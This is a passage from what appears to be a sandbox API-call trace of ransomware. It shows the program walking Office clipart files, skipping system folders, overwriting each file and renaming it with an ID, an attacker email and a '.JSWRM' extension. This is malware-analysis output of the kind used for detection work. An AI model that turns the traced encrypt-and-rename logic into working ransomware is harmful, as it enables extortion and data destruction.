office\\root\\clipart\\pub60cor\\j0240157.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.537] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7672) returned 1 [0088.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1df0) returned 0x205850 [0088.537] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1df0, lpOverlapped=0x0) returned 1 [0088.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.548] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1df0, lpOverlapped=0x0) returned 1 [0088.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.549] CloseHandle (hObject=0x314) returned 1 [0088.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0088.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0088.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0088.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0088.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.549] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240157.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240157.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.550] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xed05f07, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa410, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0240175.WMF", cAlternateFileName="")) returned 1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2=".") returned 1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="..") returned 1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="...") returned 1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="windows") returned -1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="recovery") returned -1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="perflogs") returned -1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="documents and settings") returned 1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="system volume information") returned -1 [0088.550] lstrcmpiW (lpString1="J0240175.WMF", lpString2="msocache") returned -1 [0088.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240175.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240175.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240175.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0088.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240175.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240175.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240175.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0088.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0088.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.551] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42000) returned 1 [0088.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa410) returned 0x24d210 [0088.552] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa410, lpOverlapped=0x0) returned 1 [0088.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.557] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa410, lpOverlapped=0x0) returned 1 [0088.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.558] CloseHandle (hObject=0x314) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.558] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.559] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xed05f07, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0240189.WMF", cAlternateFileName="")) returned 1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2=".") returned 1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="..") returned 1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="...") returned 1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="windows") returned -1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="recovery") returned -1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="perflogs") returned -1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="documents and settings") returned 1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="system volume information") returned -1 [0088.559] lstrcmpiW (lpString1="J0240189.WMF", lpString2="msocache") returned -1 [0088.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0088.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240189.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240189.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240189.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0088.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240189.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240189.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240189.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.560] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3524) returned 1 [0088.560] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x23fc98 [0088.560] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0088.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.563] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0088.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.563] CloseHandle (hObject=0x314) returned 1 [0088.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0088.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0088.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0088.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0088.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0088.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.564] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0088.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.565] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1476, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0240291.WMF", cAlternateFileName="")) returned 1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2=".") returned 1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="..") returned 1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="...") returned 1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="windows") returned -1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="recovery") returned -1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="perflogs") returned -1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="documents and settings") returned 1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="system volume information") returned -1 [0088.565] lstrcmpiW (lpString1="J0240291.WMF", lpString2="msocache") returned -1 [0088.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240291.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240291.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240291.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240291.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240291.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240291.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.566] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5238) returned 1 [0088.566] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1470) returned 0x205850 [0088.566] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1470, lpOverlapped=0x0) returned 1 [0088.568] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.568] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1470, lpOverlapped=0x0) returned 1 [0088.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.568] CloseHandle (hObject=0x314) returned 1 [0088.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.568] MultiByteToWideChar (in: 